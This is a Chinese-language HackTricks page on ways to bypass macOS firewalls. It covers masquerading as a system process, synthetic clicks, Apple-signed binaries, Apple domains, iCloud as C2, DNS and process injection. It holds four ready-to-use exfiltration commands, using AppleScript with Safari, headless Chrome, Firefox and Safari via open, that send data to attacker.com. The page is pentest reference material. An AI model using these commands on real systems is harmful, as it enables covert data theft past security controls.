hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

4.2 KiB
Raw Blame History

macOS绕过防火墙

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式

发现的技术

以下技术在某些macOS防火墙应用程序中可行。

滥用白名单名称

  • 例如将恶意软件命名为众所周知的macOS进程名称如**launchd**

合成点击

  • 如果防火墙要求用户授权,使恶意软件点击允许

使用苹果签名的二进制文件

  • 像**curl这样的,还有其他像whois**这样的

众所周知的苹果域名

防火墙可能允许连接到众所周知的苹果域名,如**apple.comicloud.com**。iCloud可能被用作C2。

通用绕过

一些尝试绕过防火墙的想法

检查允许的流量

了解允许的流量将帮助您识别潜在的白名单域或允许访问它们的应用程序。

lsof -i TCP -sTCP:ESTABLISHED

滥用 DNS

DNS 解析是通过已签名的 mdnsreponder 应用程序完成的,很可能会被允许与 DNS 服务器联系。

https://www.youtube.com/watch?v=UlT5KFTMn2k

通过浏览器应用程序

  • oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
  • 谷歌浏览器

{% code overflow="wrap" %}

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

{% endcode %}

  • 火狐浏览器
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
  • Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

通过进程注入

如果您可以将代码注入到允许连接到任何服务器的进程中,您可以绕过防火墙保护:

{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}

参考资料

从零开始学习AWS黑客技术 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式